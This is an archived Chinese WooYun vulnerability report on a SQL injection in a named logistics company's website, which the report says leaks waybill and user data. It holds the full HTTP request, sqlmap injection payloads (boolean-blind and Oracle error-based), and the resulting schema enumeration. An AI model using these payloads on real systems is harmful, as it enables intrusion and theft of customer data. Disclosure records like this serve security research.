乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开
盛辉物流主站某处sql注入,泄露所有运单信息,以及用户资料
http://www.shenghui56.com/注入产生在此处
POST /api/getcity HTTP/1.1Host: www.shenghui56.comContent-Length: 10Accept: application/json, text/javascript, */*; q=0.01Origin: http://www.shenghui56.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.shenghui56.com/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=F78D3014F8BDECE128318FDC1E83A1CE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1459869997; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1459869997pid=350000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk---[12:49:34] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[12:49:34] [INFO] fetching database (schema) names[12:49:34] [INFO] the SQL query used returns 24 entriesavailable databases [24]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] HD[*] MDSYS[*] MWLAPP[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SHAC[*] SHEFFE[*] SHITEM[*] SHWLAPP[*] SMS_XTTX[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: pid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk---[12:51:16] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[12:51:16] [INFO] fetching current database[12:51:16] [INFO] resumed: SHWLAPPcurrent schema (equivalent to database on Oracle): 'SHWLAPP'
只是跑跑了数据个数,不干脱裤那种事。。。
过滤啊大哥。。地址也是可控的
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)